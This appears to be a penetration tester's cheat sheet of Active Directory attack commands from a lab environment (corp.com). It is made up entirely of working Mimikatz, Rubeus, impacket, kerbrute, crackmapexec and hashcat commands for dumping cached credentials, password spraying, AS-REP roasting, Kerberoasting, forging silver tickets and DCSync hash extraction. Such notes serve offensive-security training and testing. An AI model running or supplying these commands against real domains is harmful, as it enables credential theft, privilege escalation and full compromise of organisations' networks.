Cached AD Credentials
Run PowerShell as Admin, Run Mimikatz with standard setup
PS C:\Users\stephanie> .\mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonpasswords
PS C:\Users\stephanie> dir \web04.corp.com\backup
mimikatz> sekurlsa::tickets
Password Attacks
View account policy
PS C:\Users\stephanie> net accounts
# Lockout Threshold = N-1 times before triggering lockout
# Lockout observation window = N minutes before additional attempts (should reset)
PS C:\Users\stephanie> powershell -ep bypass
PS C:\Users\stephanie> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
kali@kali:~$ crackmapexec smb <TARGET_IP> -u <USER/USERLIST.txt> -p "Nexus123!" -d corp.com --continue-on-success
# If (Pwned!), user has admin priv</TARGET_IP>
PS C:\Users\stephanie> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt “Nexus123!”
kali@kali:~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
kali@kali:~$ ./kerbrute_linux_amd64 userenum /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt –dc <dc-ip> --domain <domain></domain></dc-ip>
kali@kali:~$ ./kerbrute_linux_amd64 userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt –dc <dc-ip> --domain <domain></domain></dc-ip>
AS-REP Roasting
AS-REP on Kali with impacket-GetNPUsers
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.149.70 -request -outputfile hashes.asreproast corp.com/pete
# use domain controller IP, target must be in domain/user format, with password prompted after
PS C:\Users\stephanie> .\Rubeus.exe asreproast /nowrap
# Automatically identifies vulnerable user accounts
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule –force
PS C:\Users\stephanie> powershell -e bypass
PS C:\Users\stephanie> Import-Module .\PowerView.ps1
PS C:\Users\stephanie> Get-Domainuser -PreauthNotRequired | select name
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.149.70 corp.com/pete
Kerberoasting
Kerberoasting using Rubeus (Windows)
PS C:\Users\stephanie> .\Rebeus.exe kerberoast /outfile:hashes.kerberoast
# Will automatically identify all SPNs linked with domain user e.g. iis_service
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.149.70 -outputfile hashes.kerberoast corp.com/pete
# use domain controller IP, if error Clock skew too great, sync time of Kali machine to the DC using ntpdate or rdate
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule –force
Silver Tickets
Requires: SPN Password Hash, Domain SID, Target SPN
# Get iis_service user’s NTLM hash via Mimikatz
mimikatz> privilege::debug
mimikatz> sekurlsa::logonpasswords
PS C:\Users\jeff> whoami /user
# Omit RID of the user (last - onwards)
mimikatz> kerberos::golden /sid:<DOMAIN_SID> /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:<SPN_NTLM_HASH> /user:jeffadmin
# use existing domain user with permissions to copy/impersonate</SPN_NTLM_HASH></DOMAIN_SID>
PS C:\Users\stephanie> klist
PS C:\Users\stephanie> iwr -UseDefaultCredentials http://web04
DCSync Attack
Use mimikatz to run dcsync attack to fetch NTLM hash (Requires Admin)
mimikatz> lsadump::dcsync /user:corp/dave
# Able to obtain any user password hash in the domain, even Administrator
kali@kali:~$ impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:”PASSWORD”@192.168.149.70
# -just-dc-user = Target username
# Credential format = domain/user:password@DC_IP
